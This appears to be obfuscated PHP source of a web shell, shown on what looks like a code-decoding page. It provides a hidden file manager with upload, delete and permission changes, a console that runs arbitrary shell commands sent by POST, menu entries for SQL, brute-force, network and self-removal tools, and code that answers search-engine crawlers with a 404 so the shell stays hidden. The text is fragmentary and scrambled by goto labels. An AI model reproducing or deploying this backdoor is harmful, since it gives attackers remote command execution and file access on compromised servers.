(!function_exists('hex2bin')) { function hex2bin($p) { return decbin(hexdec($p)); } } goto d35ed; e2a28: XCOPhFooter();
goto B7d04; Ec7f9: if (empty($_POST['ajax']) && !empty($_POST['p1'])) { XCOPhsetcookie(md5($_SERVER['HTTP_HOST']) .
'ajax', 0); } goto Db5ad; F7330: function XCOPhRecursiveGlob($path) { goto Dc8c2; c5503: if (is_array($paths) &&
@count($paths)) { foreach ($paths as $item) { if (@is_dir($item)) { if ($path != $item) { XCOPhRecursiveGlob($item); } }
else { if (empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2']) !== false) { echo "<a href='#'
onclick='g(\"FilesTools\",null,\"" . urlencode($item) . "\", \"view\",\"\")'>" . htmlspecialchars($item) .
"</a><br>"; } } A3c24: } d4c08: } goto Ca2e7; Bbbbc: $paths = @array_unique(@array_merge(@glob($path .
$_POST['p3']), @glob($path . '*', GLOB_ONLYDIR))); goto c5503; Dc8c2: if (substr($path, -1) != '/') { $path .= '/'; }
goto Bbbbc; Ca2e7: } goto da79a; B7d04: } goto Dc592; B7a38: function actionFilesMan() { goto F92fb; C7101: foreach
($files as $f) { goto e24a2; Dd8d3: bf378: goto B4647; a1364: $l = $l ? 0 : 1; goto Dd8d3; e24a2: echo '<tr' . ($l
? ' class=l1' : '' ) . '><td><input type=checkbox name="f[]" value="' . urlencode($f['name'])
. '" class=chkbx></td><td><a href=# onclick="' . ($f['type']=='file' ? 'g(\' FilesTools\',null,\'' .
urlencode($f['name']) . '\' , \'view\')">' . htmlspecialchars($f['name']) : 'g(\'FilesMan\',\'' . $f['path'] .
'\');" ' . (empty($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>') .
'</a></td>
<td>' . ($f['type'] == 'file' ? XCOPhViewSize($f['size']) : $f['type']) . '</td>
<td>' . $f['modify'] . '</td>
<td>' . $f['owner'] . '/' . $f['group'] . '</td>
<td><a href=# onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\',\'chmod\')">' . $f['perms'] . '</td>
<td><a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'rename\')">R</a> <a href="#"
onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'touch\')">T</a>' . ($f['type'] == 'file'
? ' <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'edit\')">E</a> <a href="#"
onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'download\')">D</a>' : '') . '</td>
</tr>'; goto a1364; B4647: } goto b639c; F2c69: if (class_exists('ZipArchive')) { echo "<option value='zip'>Compress
(zip)</option>
<option value='unzip' selected>Uncompress (unzip)</option>"; } goto e9551; C00b8: echo "<tr>
<td colspan=7>
<input type=hidden name=a value='FilesMan'>
<input type=hidden name=c
value='" . htmlspecialchars($GLOBALS[' cwd']) . "'>
<input type=hidden name=charset value='" .
(isset($_POST['charset']) ? $_POST['charset'] : '' )
. "'>
<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"
; goto F2c69; e9551: echo "<option value='tar'>Compress (tar.gz)</option>" ; goto c2f30; D70b9: $i=0;
goto d8ddb; Acd57: echo "<input type='submit' value='>>'></td></tr></form></table></div>" ; goto B13bd;
A23f4: $n=count($dirContent); goto D70b9; Bba11: $GLOBALS['sort']=$sort; goto eb610; Edc50: if
($dirContent===false) { goto C3aaa; C3aaa: echo 'Can\' t open this folder!'; goto D47f8; b45b5: return;
goto f0589; D47f8: XCOPhFooter(); goto b45b5; f0589: } goto Fdc3d; bc342: if (!empty($_POST['p1'])) { if
(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) { $sort=array($match[1], (int) $match[2]); }
} goto A9abd; b9a66: echo "</select> " ; goto bf769; b2756: $i++; goto Cbd33; Fe590: if
(!empty($_POST['p1'])) { goto db671; F0a4f: ac92e: goto a49d4; a49d4: c9cf2: goto Fa4d2; db671: switch
($_POST['p1']) { case 'uploadFile' : if (!@move_uploaded_file($_FILES['f']['tmp_name'],
$_FILES['f']['name'])) { echo "Can't upload file!" ; } goto c9cf2; case 'mkdir' : if
(!@mkdir($_POST['p2'])) { echo "Can't create new dir" ; } goto c9cf2; case 'delete' : goto B6c77; Feadb:
if (is_array(@$_POST['f'])) { foreach ($_POST['f'] as $f) { goto ddea8; F18a8: if (is_dir($f)) {
deleteDir($f); } else { @unlink($f); } goto Afb03; Afb03: Cd3eb: goto f3c03; d29e3: $f=urldecode($f);
goto F18a8; ddea8: if ($f=='..' ) { goto Cd3eb; } goto d29e3; f3c03: } bef0b: } goto C28d8; B6c77:
function deleteDir($path) { goto C3761; fce4b: $type=filetype($item); goto f4400; adff4: @rmdir($path);
goto e166e; f4400: if ($type=="dir" ) { deleteDir($item); } else { @unlink($item); } goto b294d; e2df9:
if (basename($item)==".." || basename($item)=="." ) { goto C06e3; } goto fce4b; Eb459: closedir($dh);
goto adff4; f3093: ef706: goto Eb459; C7c44: $dh=opendir($path); goto d98ff; d98ff: C06e3: goto E1a38;
C3761: $path=substr($path, -1)=='/' ? $path : $path . '/' ; goto C7c44; E1a38: if
(!(($item=readdir($dh)) !==false)) { goto ef706; } goto D4d39; D4d39: $item=$path . $item; goto e2df9;
b294d: goto C06e3; goto f3093; e166e: } goto Feadb; C28d8: goto c9cf2; goto c9206; c9206: case 'paste' :
goto f68fa; f68fa: if ($_COOKIE['act']=='copy' ) { goto Cd5e3; Cd5e3: function copy_paste($c, $s, $d) {
if (is_dir($c . $s)) { goto E9804; Cf2bd: $h=@opendir($c . $s); goto C6e67; abe88: if ($f !="." and $f
!=".." ) { copy_paste($c . $s . '/' , $f, $d . $s . '/' ); } goto d6d02; E9804: mkdir($d . $s); goto
Cf2bd; C30cc: dba21: goto C5a33; D133f: if (!(($f=@readdir($h)) !==false)) { goto dba21; } goto abe88;
d6d02: goto Ba17f; goto C30cc; C6e67: Ba17f: goto D133f; C5a33: } elseif (is_file($c . $s)) { @copy($c .
$s, $d . $s); } } goto d63d3; E3a95: ea2c6: goto E685e; d63d3: foreach ($_COOKIE['f'] as $f) {
copy_paste($_COOKIE['c'], $f, $GLOBALS['cwd']); A0baa: } goto E3a95; E685e: } elseif
($_COOKIE['act']=='move' ) { goto bdfb4; bdfb4: function move_paste($c, $s, $d) { if (is_dir($c . $s)) {
goto cf925; d745e: if (!(($f=@readdir($h)) !==false)) { goto c39eb; } goto ba048; fdc73: c39eb: goto
bec75; ba048: if ($f !="." and $f !=".." ) { copy_paste($c . $s . '/' , $f, $d . $s . '/' ); } goto
E35f9; E35f9: goto c1a13; goto fdc73; B2317: $h=@opendir($c . $s); goto dec4f; dec4f: c1a13: goto d745e;
cf925: mkdir($d . $s); goto B2317; bec75: } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } }
goto D4c28; E3e76: e98fc: goto c784f; D4c28: foreach ($_COOKIE['f'] as $f) { @rename($_COOKIE['c'] . $f,
$GLOBALS['cwd'] . $f); D499a: } goto E3e76; c784f: } elseif ($_COOKIE['act']=='zip' ) { if
(class_exists('ZipArchive')) { $zip=new ZipArchive(); if ($zip->open($_POST['p2'], 1)) { goto bdcfc;
bdcfc: chdir($_COOKIE['c']); goto Bcfe0; Bcfe0: foreach ($_COOKIE['f'] as $f) { goto c4d27; a8a2f: a7833:
goto d984b; dd876: if (@is_file($_COOKIE['c'] . $f)) { $zip->addFile($_COOKIE['c'] . $f, $f); } elseif
(@is_dir($_COOKIE['c'] . $f)) { goto cf547; B4e0d: foreach ($iterator as $key => $value) {
$zip->addFile(realpath($key), $key); Cd2a9: } goto E4f52; cf547: $iterator = new
RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . '/', FilesystemIterator::SKIP_DOTS)); goto
B4e0d; E4f52: e45d7: goto F8204; F8204: } goto a8a2f; c4d27: if ($f == '..') { goto a7833; } goto dd876;
d984b: } goto F001c; C54d8: chdir($GLOBALS['cwd']); goto aa299; F001c: A478c: goto C54d8; aa299:
$zip->close(); goto Fadf6; Fadf6: } } } elseif ($_COOKIE['act'] == 'unzip') { if
(class_exists('ZipArchive')) { goto Ad4de; Cba69: foreach ($_COOKIE['f'] as $f) { if
($zip->open($_COOKIE['c'] . $f)) { $zip->extractTo($GLOBALS['cwd']); $zip->close(); } f30e4: } goto f1610;
f1610: cae3d: goto acf74; Ad4de: $zip = new ZipArchive(); goto Cba69; acf74: } } elseif ($_COOKIE['act'] ==
'tar') { goto De7c0; e409c: XCOPhEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ',
$_COOKIE['f'])); goto a9ddc; De7c0: chdir($_COOKIE['c']); goto ca67c; a9ddc: chdir($GLOBALS['cwd']); goto
E5a51; ca67c: $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); goto e409c; E5a51: } goto a428c;
a428c: unset($_COOKIE['f']); goto C76d9; c15bb: goto c9cf2; goto b02bf; C76d9: setcookie('f', '', time() -
3600); goto c15bb; b02bf: default: if (!empty($_POST['p1'])) { goto Bfcd2; d74b3: XCOPhsetcookie('c',
@$_POST['c']); goto a5e95; C3745: XCOPhsetcookie('f', serialize(@$_POST['f'])); goto d74b3; Bfcd2:
XCOPhsetcookie('act', $_POST['p1']); goto C3745; a5e95: } goto c9cf2; } goto F0a4f; Fa4d2: } goto B6cb2;
Fdc3d: global $sort; goto d82ec; d8ddb: E357c: goto ec3d7; f75b7: F52b1: goto Bba11; f6d44: usort($files,
"XCOPhCmp"); goto Fdb4e; c2f30: if (!empty($_COOKIE['act']) && @count($_COOKIE['f'])) { echo "<option
value='paste'>Paste / Compress</option>"; } goto b9a66; fcb2c: $dirs = $files = array(); goto A23f4;
d82ec: $sort = array('name', 1); goto bc342; eb610: function XCOPhCmp($a, $b) { if ($GLOBALS['sort'][0] !=
'size') { return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) *
($GLOBALS['sort'][1] ? 1 : -1); } else { return ($a['size'] < $b['size'] ? -1 : 1) * ($GLOBALS['sort'][1] ?
1 : -1); } } goto f6d44; A85d7: $l=0; goto C7101; Dfba9: if (@is_file($GLOBALS['cwd'] .
$dirContent[$i])) { $files[]=array_merge($tmp, array('type'=> 'file')); } elseif
(@is_link($GLOBALS['cwd'] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array('type' => 'link',
'link' => readlink($tmp['path']))); } elseif (@is_dir($GLOBALS['cwd'] . $dirContent[$i])) { $dirs[] =
array_merge($tmp, array('type' => 'dir')); } goto Da65c; faa24: $files = array_merge($dirs, $files);
goto A85d7; F92fb: if (!empty($_COOKIE['f'])) { $_COOKIE['f'] = @unserialize($_COOKIE['f']); } goto
Fe590; B13bd: XCOPhFooter(); goto F9d66; e96e2: echo '<h1>File manager</h1>
<div class=content>
<script>p1_ = p2_ = p3_ = "";</script>'; goto D1b19; Cbd33: goto E357c; goto f75b7; B6cb2: XCOPhHeader();
goto e96e2; ec3d7: if (!($i < $n)) { goto F52b1; } goto d2437; bf769: if (!empty($_COOKIE['act']) &&
@count($_COOKIE['f']) && ($_COOKIE['act']=='zip' || $_COOKIE['act']=='tar' )) {
echo "file name: <input type=text name=p2 value='XCOPh_" . date("Ymd_His") . "." .
($_COOKIE['act']=='zip' ? 'zip' : 'tar.gz' ) . "'> " ; } goto Acd57; E6d31:
$gr=@posix_getgrgid(@filegroup($dirContent[$i])); goto F0500; d2437:
$ow=@posix_getpwuid(@fileowner($dirContent[$i])); goto E6d31; b639c: Bcbb2: goto C00b8; Da65c:
de3f6: goto b2756; A9abd:
echo "<script>
function sa() {
for(i = 0; i < d.files.elements.length; i++)
if(d.files.elements[i].type == 'checkbox')
d.files.elements[i].checked = d.files.elements[0].checked;
}
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"
FilesMan\",null,\"s_name_" . ($sort[1] ? 0 : 1) . "\" )'>Name</a></th>
<th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_" . ($sort[1] ? 0 : 1) . "\")'>Size</a></th>
<th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_" . ($sort[1] ? 0 : 1) . "\")'>Modify</a></th>
<th>Owner/Group</th>
<th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_" . ($sort[1] ? 0 : 1) . "\")'>Permissions</a></th>
<th>Actions</th>
</tr>"; goto fcb2c; F0500: $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'] . $dirContent[$i],
'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' =>
XCOPhPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'] . $dirContent[$i]), 'owner'
=> $ow['name'] ? $ow['name'] : @fileowner($dirContent[$i]), 'group' => $gr['name'] ? $gr['name'] :
@filegroup($dirContent[$i])); goto Dfba9; D1b19: $dirContent = XCOPhScandir(isset($_POST['c']) ? $_POST['c'] :
$GLOBALS['cwd']); goto Edc50; Fdb4e: usort($dirs, "XCOPhCmp"); goto faa24; F9d66: } goto Cf332; ee229: if
(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) { $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)
$default_use_ajax; } goto F0eb8; cb8a1: function actionConsole() { goto B8795; f0939: if (!empty($_POST['p1'])) {
echo htmlspecialchars("\$ " . $_POST['p1'] . "
" . XCOPhEx($_POST['p1'])); } goto D4515; b6928: echo "
<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');
var cur = 0;
function kp(e) {
var n = (window.Event) ? e.which : e.keyCode;
if(n == 38) {
cur--;
if(cur >= 0)
document.cf.cmd.value = cmds[cur];
else
cur++;
} else if (n == 40) {
cur++;
if(cur < cmds.length)
document.cf.cmd.value = cmds[cur];
else
cur--;
}
}
function add(cmd) {
cmds.pop();
cmds.push(cmd);
cmds.push('');
cur = cmds.length - 1;
}
</script>
"; goto A5fd8; e3b6f: Bb9a9: goto E0bb9; F3db2: XCOPhHeader(); goto b6928; C28c5: if (empty($_POST['ajax']) &&
!empty($_POST['p1'])) { XCOPhsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); } goto F3db2; E0bb9: echo
'</select><input type=button
onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}"
value=">>">
<nobr><input type=checkbox name=ajax value=1 ' . (@$_COOKIE[md5($_SERVER[' HTTP_HOST']) . 'ajax' ] ? 'checked' : ''
) . '> send using AJAX <input type=checkbox name=show_errors value=1 ' . (!empty($_POST['p2']) ||
$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'stderr_to_out' ] ? 'checked' : '' )
. '> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>'
; goto f0939; A5fd8: echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'
clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return
false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}
return false;"><select name=alias>'; goto ebaf1; D4515: echo '</textarea>
<table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0
width="100%">
<tr>
<td width="1%">$</td>
<td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td>
</tr>
</table>'; goto daa84; F5a92: if (isset($_POST['ajax'])) { goto E9651; b6bcf: echo strlen($temp), "
",
$temp; goto a2dda; Ab3dc: if (preg_match("!.*cd\s+([^;]+)\$!", $_POST['p1'], $match)) { if
(@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo "c_='" . $GLOBALS['cwd'] . "';"; } } goto C0934;
E9651: XCOPhsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); goto bc11c; f3920: echo
"d.cf.output.scrollTop = d.cf.output.scrollHeight;"; goto e5afa; a04b2: echo "d.cf.cmd.value='';
"; goto
D5a95; bc11c: ob_start(); goto a04b2; C0934: echo "d.cf.output.value+='" . $temp . "';"; goto f3920; e5afa:
$temp = ob_get_clean(); goto b6bcf; a2dda: exit; goto c1661; D5a95: $temp = @iconv($_POST['charset'],
'UTF-8', addcslashes("
\$ " . $_POST['p1'] . "
" . XCOPhEx($_POST['p1']), "
\'")); goto Ab3dc;
c1661: } goto C28c5; daa84: echo '</form>
</div>
<script>d.cf.cmd.focus();</script>'; goto Def11; ebaf1: foreach ($GLOBALS['aliases'] as $n => $v) { goto
Fb8f2; Fb8f2: if ($v == '') { echo '<optgroup label="-' . htmlspecialchars($n) . '-"></optgroup>'; goto
db56e; } goto cc583; cc583: echo '<option value="' . htmlspecialchars($v) . '">' . $n . '</option>'; goto
A736d; A736d: db56e: goto c9981; c9981: } goto e3b6f; B8795: if (!empty($_POST['p1']) &&
!empty($_POST['p2'])) { XCOPhsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', true); $_POST['p1'] .=
' 2>&1'; } elseif (!empty($_POST['p1'])) { XCOPhsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', 0);
} goto F5a92; Def11: XCOPhFooter(); goto e4004; e4004: } goto bf030; E8eb6: if ($cwd[strlen($cwd) - 1] !=
'/') { $cwd .= '/'; } goto ee229; bf030: function actionLogout() { setcookie(md5($_SERVER['HTTP_HOST']), '',
time() - 3600); die('bye!'); } goto A9c07; B8cff: if (!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents =
array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if (preg_match('/' . implode('|',
$userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } goto E7176;
C5959: function XCOPhHeader() { goto B2a88; A44c0: foreach ($charsets as $item) { $opt_charsets .= '<option
value="' . $item . '" ' . ($_POST[' charset']==$item ? 'selected' : '' ) . '>' . $item . '</option>' ;
Bd9bf: } goto dcaf5; b5e8a: if (strpos('Linux', $kernel) !==false) { $explink .=urlencode('Linux
Kernel ' . substr($release, 0, 6)); } else { $explink .= urlencode($kernel . ' ' . substr($release, 0, 3)); } goto Df759; fb8dd: f7f35: goto abf5d; bfba9: A6230: goto b1229; B2a88: if (empty($_POST['
charset'])) { $_POST['charset']=$GLOBALS['default_charset']; } goto E6626; f777e: ffc7f: goto ad9ac;
C8c00: foreach ($m as $k=> $v) { $menu .= '<th width="' . (int) (100 / count($m)) . '%">[ <a href="#"
onclick="g(\'' . $v . '\',null,\'\',\'\',\'\')">' . $k . '</a> ]</th>'; a3ec1: } goto E7224;
cf09b: if (!empty($GLOBALS['auth_pass'])) { $m['Logout'] = 'Logout'; } goto Af433; a428e: goto bf5e0;
goto f777e; b0a15: $kernel = @php_uname('s'); goto F8e92; b1229: if (!($i < $n - 1)) { goto f7f35; }
goto a53dc; a53dc: $cwd_links .="<a href='#' onclick='g(\" FilesMan\",\""; goto f631b; abf5d:
$charsets=array('UTF-8', 'Windows-1251' , 'KOI8-R' , 'KOI8-U' , 'cp866' ); goto A6238; A1a51:
$totalSpace=@disk_total_space($GLOBALS['cwd']); goto F6105; f8de1: bf5e0: goto cb9f1; ba93f: a5e84:
goto Ca109; a8bbe: C3ad7: goto bbf29; Ca109: $j++; goto a428e; C13ee:
$freeSpace=@diskfreespace($GLOBALS['cwd']); goto A1a51; cc894: $path=explode("/", $GLOBALS['cwd']);
goto B375c; f631b: $j=0; goto f8de1; cb9f1: if (!($j <=$i)) { goto ffc7f; } goto Deb37; E6626:
global $color; goto De5c8; a6d50:
echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:'
. ($GLOBALS['os']=='win' ? '<br>Drives:' : '' ) . '</span></td>' . '<td><nobr>' .
substr(@php_uname(), 0, 120) . '</nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' .
$gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' .
($GLOBALS['safe_mode'] ? '<font color=red>ON</font>' : '<font color=green><b>OFF</b></font>' )
. ' <a href=# onclick="g(\' Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' .
date('Y-m-d H:i:s') . '<br>' . XCOPhViewSize($totalSpace) . ' <span>Free:</span> ' .
XCOPhViewSize($freeSpace) . ' (' . (int) ($freeSpace / $totalSpace * 100) . '%)<br>' . $cwd_links .
' ' . XCOPhPermsColor($GLOBALS['cwd']) . ' <a href=#
onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' .
$drives . '</td>' . '<td width=1 align=right>
<nobr><select onchange="g(null,null,null,null,null,this.value)">
<optgroup label="Page charset">' . $opt_charsets . '</optgroup>
</select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client
IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr>
</td>
</tr>
</table>' . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%>
<tr>' . $menu . '</tr>
</table>
<div style="margin:5">'; goto aea39; D0ca7: $m = array('Sec. Info' => 'SecInfo', 'Files' =>
'FilesMan', 'Console' => 'Console', 'Sql' => 'Sql', 'Php' => 'Php', 'String tools' =>
'StringTools', 'Bruteforce' => 'Bruteforce', 'Network' => 'Network'); goto cf09b; A6238:
$opt_charsets = ''; goto A44c0; bbf29: $i++; goto e33db; a6010: $i = 0; goto bfba9; E7224:
De799: goto dcb11; B3fc9: $release = @php_uname('r'); goto b0a15; F8e92: $explink = ''; goto
b5e8a; b3257: $cwd_links = ''; goto cc894; B375c: $n = count($path); goto a6010; Deb37:
$cwd_links .= $path[$j] . '/'; goto ba93f; Cc1b0: $menu = ''; goto C8c00; De5c8: echo "<html>
<head>
<meta http-equiv='Content-Type' content='text/html; charset=" . $_POST[' charset']
. "'><title>" . $_SERVER['HTTP_HOST']
. "</title>
<style>
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color: {$color} !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid {$color};padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid {$color}; font: 9pt Monospace,'Courier New'; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
.l2{background-color:#333}
pre{font-family:Courier,Monospace;}
</style>
<script>
var c_ = '"
.htmlspecialchars($GLOBALS['cwd']). "';
var a_ = '".
htmlspecialchars(@$_POST['a']). "'
var charset_ = '".
htmlspecialchars(@$_POST['charset']). "';
var p1_ = '".
(strpos(@$_POST['p1'], "
") !== false ? '' : htmlspecialchars($_POST['p1'],
ENT_QUOTES)). "';
var p2_ = '". (strpos(@$_POST['p2'], "
") !== false ? '' :
htmlspecialchars($_POST['p2'], ENT_QUOTES)). "';
var p3_ = '".
(strpos(@$_POST['p3'], "
") !== false ? '' : htmlspecialchars($_POST['p3'],
ENT_QUOTES))
. "';
var d = document;
function set(a,c,p1,p2,p3,charset) {
if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
//if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
d.mf.submit();
}
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
var params = 'ajax=true';
for(i=0;i<d.mf.elements.length;i++)
params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
sr('"
.addslashes($_SERVER['REQUEST_URI'])
. "', params);
}
function sr(url, params) {
if (window.XMLHttpRequest)
req = new XMLHttpRequest();
else if (window.ActiveXObject)
req = new ActiveXObject('Microsoft.XMLHTTP');
if (req) {
req.onreadystatechange = processReqChange;
req.open('POST', url, true);
req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
req.send(params);
}
}
function processReqChange() {
if( (req.readyState == 4) )
if(req.status == 200) {
var reg = new RegExp(\"
(\\d +)([\\S\\s] *) \", 'm' );
var
arr = reg.exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
}
else alert('Request error!');
}
</script>
<head>
<body>
<div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form
method=post name=mf style='display:none;'>
<input type=hidden
name=a>
<input type=hidden name=c>
<input type=hidden
name=p1>
<input type=hidden name=p2>
<input type=hidden
name=p3>
<input type=hidden name=charset>
</form>"; goto C13ee; F6105:
$totalSpace = $totalSpace ? $totalSpace : 1; goto B3fc9; b1015: if ($GLOBALS['os']
== 'win') { foreach (range('c', 'z') as $drive) { if (is_dir($drive . ':\')) {
$drives .= '<a href="#" onclick="g(\'FilesMan\',\'' . $drive . ':/\')">[ ' . $drive
. ' ]</a> '; } E6b41: } Aeb5c: } goto a6d50; ad9ac: $cwd_links .= "\")'>" .
$path[$i] . "/</a>"; goto a8bbe; e33db: goto A6230; goto fb8dd; dcb11: $drives = "";
goto b1015; Af433: $m['Self remove'] = 'SelfRemove'; goto Cc1b0; Df759: if
(!function_exists('posix_getegid')) { goto A427d; Bdc04: $group = "?"; goto C134e;
A427d: $user = @get_current_user(); goto Ff189; Ff189: $uid = @getmyuid(); goto
ae6c9; ae6c9: $gid = @getmygid(); goto Bdc04; C134e: } else { goto e2288; a7782:
$uid = $uid['uid']; goto ae8e9; Dc93c: $gid = @posix_getgrgid(posix_getegid()); goto
Bacc4; A57e0: $gid = $gid['gid']; goto a7667; e2288: $uid =
@posix_getpwuid(posix_geteuid()); goto Dc93c; Bacc4: $user = $uid['name']; goto
a7782; ae8e9: $group = $gid['name']; goto A57e0; a7667: } goto b3257; dcaf5: aa543:
goto D0ca7; aea39: } goto de990; d8f3d: if (!function_exists("posix_getgrgid") &&
strpos($GLOBALS['disable_functions'], 'posix_getgrgid') === false) { function
posix_getgrgid($p) { return false; } } goto D16d3; C6f8b: $auth_pass = ""; goto
Dfd08; de990: function XCOPhFooter() { $is_writable = is_writable($GLOBALS['cwd']) ?
" <font color='green'>(Writeable)</font>" : " <font color=red>(Not writable)</font>
"; echo "
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0
width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>
<tr>
<td>
<form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change
dir:</span><br><input class='toolsInp' type=text name=c
value='" . htmlspecialchars($GLOBALS[' cwd'])
. "'><input type=submit value='>>'></form></td>
<td><form onsubmit=\"
g('FilesTools',null,this.f.value);return false;\"><span>Read
file:</span><br><input class='toolsInp' type=text name=f><input
type=submit value='>>'></form>
</td>
</tr>
<tr>
<td>
<form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\">
<span>Make dir:</span>{$is_writable}<br><input class='toolsInp'
type=text name=d><input type=submit value='>>'></form>
</td>
<td>
<form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\">
<span>Make file:</span>{$is_writable}<br><input class='toolsInp'
type=text name=f><input type=submit value='>>'></form>
</td>
</tr>
<tr>
<td>
<form onsubmit=\"g('Console',null,this.c.value);return false;\">
<span>Execute:</span><br><input class='toolsInp' type=text name=c
value=''><input type=submit value='>>'></form>
</td>
<td>
<form method='post' ENCTYPE='multipart/form-data'>
<input type=hidden
name=a value='FilesMAn'>
<input type=hidden name=c
value='" . $GLOBALS[' cwd']
. "'>
<input type=hidden name=p1 value='uploadFile'>
<input type=hidden name=charset value='"
. (isset($_POST['charset']) ? $_POST['charset'] : '' )
. "'>
<span>Upload file:</span>{$is_writable}<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>
</tr></table></div></body></html>"
; } goto E39a8; B2753: function XCOPhViewSize($s) { if (is_int($s))
{ $s=sprintf("%u", $s); } if ($s>= 1073741824) { return
sprintf('%1.2f', $s / 1073741824) . ' GB'; } elseif ($s >= 1048576) {
return sprintf('%1.2f', $s / 1048576) . ' MB'; } elseif ($s >= 1024) {
return sprintf('%1.2f', $s / 1024) . ' KB'; } else { return $s . ' B'; }
} goto e7b25; E8593: $safe_mode = @ini_get('safe_mode'); goto Ed7d4;
Aaf31: $cwd = @getcwd(); goto A54db; E7176: @ini_set('error_log', NULL);
goto dc87f; b936e: exit; ?>
Did this file decode correctly?
Original Code
